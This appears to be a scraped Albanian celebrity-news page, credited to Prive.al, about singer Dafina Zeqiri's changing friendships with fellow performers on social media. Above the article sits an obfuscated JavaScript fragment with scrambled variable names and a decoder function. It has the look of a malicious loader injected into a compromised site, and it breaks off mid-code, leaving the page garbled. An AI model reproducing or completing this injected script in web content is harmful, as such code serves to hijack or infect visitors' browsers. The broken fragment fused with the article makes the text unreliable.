;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Veprime të çuditshme e befasuese nga Dafina kohëve të fundit!

By

Ngjitjen drejt majave të diskografisë shqiptare e nisi duke bashkëpunuar me një rreth të ngushtë të emrave tashmë të konsoliduar.

Me kalimin e kohës kur emri i Dafina Zeqirit tashmë po fortifikohej si yll, dalëngadalë paralelisht, miqësitë me njerëzit e fillimit po shembeshin.

Këngëtarja e njohur prishi shumicën e miqësive duke mos kontaktuar pothuajse me asnjërin koleg me të cilët shihet në arkivat e fotove përgjatë viteve 2008/2012.

Dafina u ‘izolua’ brenda petkut të familjes së ekipit të saj duke mos e parë të nevojshëm kontaktin e miqësinë me njerëzit brenda sferës së showbizit, ku edhe vepron. Të rralla, për të mos thënë inekzistente ishin përkrahjet eventuale për emrat e tjerë të skenës përmes postimeve apo komenteve.

Por, befasishëm, kohëve të fundit kur edhe po orvatet të depërtoj ndërkombëtarisht, një Dafinë tjetër po shfaqet në rrjete sociale.

E nisi duke e konsideruar Noizyn vëlla, e vazhdoi me gjithë farefisin Lipa duke komentuar dhjetëra herë tek Dua dhe familja e saj dhe së fundmi po e vazhdon me emra të tjerë.

Dafina dikur hermetike, tash ka ‘lëshuar’ dorën për komente duke shprehur dashurinë befasishëm për Leonora Jakupin, Morena Tarakun, Zanfina Ismailin, Rezarta Shkurtën e Afërdita Dreshajn, veprime që sa kanë qenë të çuditshme aq edhe janë mirëpritur nga fansat.

E ‘goditja’ e fundit ka qenë me Cozman, ish të dashurin e Tunës, të cilin pas rreth katër vitesh aktivitet në skenën muzikore shqiptare, Duffy ka vendosur ta ndjekë e ta pëlqejë tek sot në Instagram, duke nxitur mediat që të aludojnë për formë ‘hakmarrjeje’ ndaj kolegës së hitit ‘Vibe’.

Më e dashur apo jo, më e afërt apo jo, Dafina duket se ka zgjedhur strategjinë e duhur duke u hapur me (ish)-miqtë sepse pa ta dhe përkrahjen e tyre, definitivisht çdo gjë është shumë, shumë më e vakët dhe dinamizmi i rrjedhave në showbiz ndoshta s’do mund të përballohej. /Prive.al/

Artikuj të ngjashëm